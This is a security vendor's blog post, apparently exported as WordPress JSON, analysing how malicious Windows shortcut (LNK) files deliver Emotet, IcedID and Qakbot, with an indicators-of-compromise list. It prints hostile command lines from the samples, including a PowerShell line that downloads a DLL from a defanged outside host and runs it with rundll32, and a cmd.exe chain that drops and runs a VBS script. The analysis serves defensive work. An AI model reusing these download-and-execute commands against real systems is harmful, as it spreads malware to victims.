{"id":155118,"date":"2022-06-21T11:58:20","date_gmt":"2022-06-21T18:58:20","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=155118"},"modified":"2024-02-26T19:37:52","modified_gmt":"2024-02-27T03:37:52","slug":"rise-of-lnk-shortcut-files-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","title":{"rendered":"Rise of LNK (Shortcut files) Malware"},"content":{"rendered":"<p>Authored by Lakshya Mathur<\/p>\n<p>An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built \u201clnkbombs\u201d tools specifically for malicious purposes.<\/p>\n<p>During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.<\/p>\n<figure id=\"attachment_155273\" aria-describedby=\"caption-attachment-155273\" style=\"width: 705px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-155273 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-1-_-Apr-to-May-month-geolocation-of-the-LNK-attacks.png\" alt=\"Figure 1 \u2013 Apr to May month geolocation of the LNK attacks\" width=\"705\" height=\"476\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-1-_-Apr-to-May-month-geolocation-of-the-LNK-attacks.png 705w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-1-_-Apr-to-May-month-geolocation-of-the-LNK-attacks-300x203.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-1-_-Apr-to-May-month-geolocation-of-the-LNK-attacks-191x129.png 191w\" sizes=\"auto, (max-width: 705px) 100vw, 705px\" \/><figcaption id=\"caption-attachment-155273\" class=\"wp-caption-text\">Figure 1 \u2013 Apr to May month geolocation of the LNK attacks<\/figcaption><\/figure>\n<p>In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.<\/p>\n<p>Below is a screenshot of how these shortcut files look to a normal user.<\/p>\n<figure id=\"attachment_155259\" aria-describedby=\"caption-attachment-155259\" style=\"width: 843px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155259\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-2-_-LNK-files-as-seen-by-a-normal-user.jpg\" alt=\"Figure 2 _ LNK files as seen by a normal user\" width=\"843\" height=\"351\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-2-_-LNK-files-as-seen-by-a-normal-user.jpg 843w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-2-_-LNK-files-as-seen-by-a-normal-user-300x125.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-2-_-LNK-files-as-seen-by-a-normal-user-768x320.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-2-_-LNK-files-as-seen-by-a-normal-user-205x85.jpg 205w\" sizes=\"auto, (max-width: 843px) 100vw, 843px\" \/><figcaption id=\"caption-attachment-155259\" class=\"wp-caption-text\">Figure 2 _ LNK files as seen by a normal user<\/figcaption><\/figure>\n<h2><strong>LNK THREAT ANALYSIS &amp; CAMPAIGNS<\/strong><\/h2>\n<p>With <a href=\"https:\/\/docs.microsoft.com\/en-us\/deployoffice\/security\/internet-macros-blocked\" target=\"_blank\" rel=\"noopener\">Microsoft disabling office macros by default<\/a> malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.<\/p>\n<p>Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.<\/p>\n<p>We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>EMOTET<\/strong><\/h2>\n<h3><strong><em>Infection-Chain<\/em><\/strong><\/h3>\n<figure id=\"attachment_155245\" aria-describedby=\"caption-attachment-155245\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-155245\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain-1024x593.png\" alt=\"Figure 3 _Emotet delivered via LNK file Infection-Chain\" width=\"1024\" height=\"593\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain-1024x593.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain-300x174.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain-768x445.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain-205x119.png 205w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-3-_Emotet-delivered-via-LNK-file-Infection-Chain.png 1195w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-155245\" class=\"wp-caption-text\">Figure 3 _Emotet delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n<h2><strong><em>Threat Analysis<\/em><\/strong><\/h2>\n<figure id=\"attachment_155231\" aria-describedby=\"caption-attachment-155231\" style=\"width: 896px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155231\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-4-_-Email-user-received-having-malicious-LNK-attached.jpg\" alt=\"Figure 4 _ Email user received having malicious LNK attached\" width=\"896\" height=\"619\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-4-_-Email-user-received-having-malicious-LNK-attached.jpg 896w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-4-_-Email-user-received-having-malicious-LNK-attached-300x207.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-4-_-Email-user-received-having-malicious-LNK-attached-768x531.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-4-_-Email-user-received-having-malicious-LNK-attached-187x129.jpg 187w\" sizes=\"auto, (max-width: 896px) 100vw, 896px\" \/><figcaption id=\"caption-attachment-155231\" class=\"wp-caption-text\">Figure 4 _ Email user received having malicious LNK attached<\/figcaption><\/figure>\n<p>In Figure 4 we can see the lure message and attached malicious LNK file.<\/p>\n<p>The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:<\/p>\n<figure id=\"attachment_155217\" aria-describedby=\"caption-attachment-155217\" style=\"width: 567px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155217\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-5-_Properties-of-Emotet-LNK-sample.jpg\" alt=\"Figure 5 _Properties of Emotet LNK sample\" width=\"567\" height=\"678\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-5-_Properties-of-Emotet-LNK-sample.jpg 567w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-5-_Properties-of-Emotet-LNK-sample-251x300.jpg 251w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-5-_Properties-of-Emotet-LNK-sample-108x129.jpg 108w\" sizes=\"auto, (max-width: 567px) 100vw, 567px\" \/><figcaption id=\"caption-attachment-155217\" class=\"wp-caption-text\">Figure 5 _Properties of Emotet LNK sample<\/figcaption><\/figure>\n<p>As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.<\/p>\n<p>In our case the argument is \/v:on \/c findstr &#8220;glKmfOKnQLYKnNs.*&#8221; &#8220;Form 04.25.2022, US.lnk&#8221; &gt; &#8220;%tmp%\\YlScZcZKeP.vbs&#8221; &amp; &#8220;%tmp%\\YlScZcZKeP.vbs&#8221;<\/p>\n<figure id=\"attachment_155203\" aria-describedby=\"caption-attachment-155203\" style=\"width: 880px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155203\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-6-_-Contents-of-Emotet-LNK-file.jpg\" alt=\"Figure 6 _ Contents of Emotet LNK file\" width=\"880\" height=\"247\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-6-_-Contents-of-Emotet-LNK-file.jpg 880w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-6-_-Contents-of-Emotet-LNK-file-300x84.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-6-_-Contents-of-Emotet-LNK-file-768x216.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-6-_-Contents-of-Emotet-LNK-file-205x58.jpg 205w\" sizes=\"auto, (max-width: 880px) 100vw, 880px\" \/><figcaption id=\"caption-attachment-155203\" class=\"wp-caption-text\">Figure 6 _ Contents of Emotet LNK file<\/figcaption><\/figure>\n<p>Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs<\/p>\n<p>The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.<\/p>\n<p>The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.<\/p>\n<h2><strong>ICEDID<\/strong><\/h2>\n<h3><strong><em>Infection-Chain<\/em><\/strong><\/h3>\n<figure id=\"attachment_155189\" aria-describedby=\"caption-attachment-155189\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-155189\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain-1024x615.png\" alt=\"Figure 7 _ IcedID delivered via LNK file Infection-Chain\" width=\"1024\" height=\"615\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain-1024x615.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain-300x180.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain-768x461.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain-205x123.png 205w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-7-_-IcedID-delivered-via-LNK-file-Infection-Chain.png 1179w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-155189\" class=\"wp-caption-text\">Figure 7 _ IcedID delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n<h2><strong><em>Threat Analysis<\/em><\/strong><\/h2>\n<p>This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.<\/p>\n<p>Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties<\/p>\n<figure id=\"attachment_155175\" aria-describedby=\"caption-attachment-155175\" style=\"width: 556px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155175\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-8-_-Properties-of-IcedID-LNK-sample.jpg\" alt=\"Figure 8 _ Properties of IcedID LNK sample\" width=\"556\" height=\"678\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-8-_-Properties-of-IcedID-LNK-sample.jpg 556w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-8-_-Properties-of-IcedID-LNK-sample-246x300.jpg 246w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-8-_-Properties-of-IcedID-LNK-sample-106x129.jpg 106w\" sizes=\"auto, (max-width: 556px) 100vw, 556px\" \/><figcaption id=\"caption-attachment-155175\" class=\"wp-caption-text\">Figure 8 _ Properties of IcedID LNK sample<\/figcaption><\/figure>\n<p>The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps:\/\/hectorcalle[.]com\/093789.hta.<\/p>\n<p>The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps:\/\/hectorcalle[.]com\/listbul.exe<\/p>\n<p>The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.<\/p>\n<h2><strong>QAKBOT<\/strong><\/h2>\n<h3><strong><em>Infection-Chain<\/em><\/strong><\/h3>\n<figure id=\"attachment_155161\" aria-describedby=\"caption-attachment-155161\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-155161\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain-1024x405.png\" alt=\"Figure 9 _ Qakbot delivered via LNK file Infection-Chain\" width=\"1024\" height=\"405\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain-1024x405.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain-300x119.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain-768x304.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain-205x81.png 205w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-9-_-Qakbot-delivered-via-LNK-file-Infection-Chain.png 1087w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-155161\" class=\"wp-caption-text\">Figure 9 _ Qakbot delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n<h2><strong><em>Threat Analysis<\/em><\/strong><\/h2>\n<p>This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.<\/p>\n<figure id=\"attachment_155147\" aria-describedby=\"caption-attachment-155147\" style=\"width: 557px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-155147\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-10-_-Properties-of-Qakbot-LNK-sample.jpg\" alt=\"Figure 10 _ Properties of Qakbot LNK sample\" width=\"557\" height=\"678\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-10-_-Properties-of-Qakbot-LNK-sample.jpg 557w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-10-_-Properties-of-Qakbot-LNK-sample-246x300.jpg 246w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/Figure-10-_-Properties-of-Qakbot-LNK-sample-106x129.jpg 106w\" sizes=\"auto, (max-width: 557px) 100vw, 557px\" \/><figcaption id=\"caption-attachment-155147\" class=\"wp-caption-text\">Figure 10 _ Properties of Qakbot LNK sample<\/figcaption><\/figure>\n<p>In Figure 10 the full target part argument is \u201cC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit iwr -Uri hxxps:\/\/news-wellness[.]com\/5MVhfo8BnDub\/D.png -OutFile $env:TEMP\\test.dll;Start-Process rundll32.exe $env:TEMP\\test.dll,jhbvygftr\u201d<\/p>\n<p>When this PowerShell LNK is invoked, it connects to hxxps:\/\/news-wellness[.]com\/5MVhfo8BnDub\/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll<\/p>\n<p>This is the main Qakbot DLL payload which is then executed using the rundll32 utility.<\/p>\n<h2><strong>CONCLUSION<\/strong><\/h2>\n<p>As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim&#8217;s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.<\/p>\n<p>We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.<\/p>\n<h2><strong>IOC (Indicators of Compromise)<\/strong><\/h2>\n<table>\n<tbody>\n<tr>\n<td width=\"129\"><strong>Type<\/strong><\/td>\n<td width=\"189\"><strong>SHA-256<\/strong><\/td>\n<td width=\"91\"><strong>Scanner<\/strong><\/td>\n<td width=\"213\">&nbsp;<\/td>\n<\/tr>\n<tr>\n<td width=\"129\">Emotet LNK<\/td>\n<td width=\"189\">02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71<\/td>\n<td width=\"91\">WSS<\/td>\n<td width=\"213\">LNK\/Emotet-FSE<\/td>\n<\/tr>\n<tr>\n<td width=\"129\">IcedID LNK<\/td>\n<td width=\"189\">24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9<\/td>\n<td width=\"91\">WSS<\/td>\n<td width=\"213\">LNK\/Agent-FTA<\/p>\n<p>Suspicious ZIP!lnk<\/td>\n<\/tr>\n<tr>\n<td width=\"129\">Qakbot LNK<\/td>\n<td width=\"189\">b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172<\/td>\n<td width=\"91\">WSS<\/td>\n<td width=\"213\">LNK\/Agent-TSR<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td width=\"129\">URLs (Uniform Resource Locator)<\/td>\n<td width=\"189\">hxxps:\/\/creemo[.]pl\/wp-admin\/ZKS1DcdquUT4Bb8Kb\/<\/p>\n<p>hxxp:\/\/filmmogzivota[.]rs\/SpryAssets\/gDR\/<\/p>\n<p>hxxp:\/\/demo34.ckg[.]hk\/service\/hhMZrfC7Mnm9JD\/<\/p>\n<p>hxxp:\/\/focusmedica[.]in\/fmlib\/IxBABMh0I2cLM3qq1GVv\/<\/p>\n<p>hxxp:\/\/cipro[.]mx\/prensa\/siZP69rBFmibDvuTP1\/<\/p>\n<p>hxxps:\/\/hectorcalle[.]com\/093789.hta<\/p>\n<p>hxxps:\/\/hectorcalle[.]com\/listbul.exe<\/p>\n<p>hxxps:\/\/green-a-thon[.]com\/LosZkUvr\/B.png<\/td>\n<td width=\"91\">WebAdvisor<\/td>\n<td width=\"213\">All URLs Blocked<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.<\/p>\n","protected":false},"author":695,"featured_media":155133,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-155118","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Rise of LNK (Shortcut files) Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rise of LNK (Shortcut files) Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-21T18:58:20+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-27T03:37:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Rise of LNK (Shortcut files) Malware\",\"datePublished\":\"2022-06-21T18:58:20+00:00\",\"dateModified\":\"2024-02-27T03:37:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"},\"wordCount\":1095,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\",\"name\":\"Rise of LNK (Shortcut files) Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"datePublished\":\"2022-06-21T18:58:20+00:00\",\"dateModified\":\"2024-02-27T03:37:52+00:00\",\"description\":\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Rise of LNK (Shortcut files) Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee 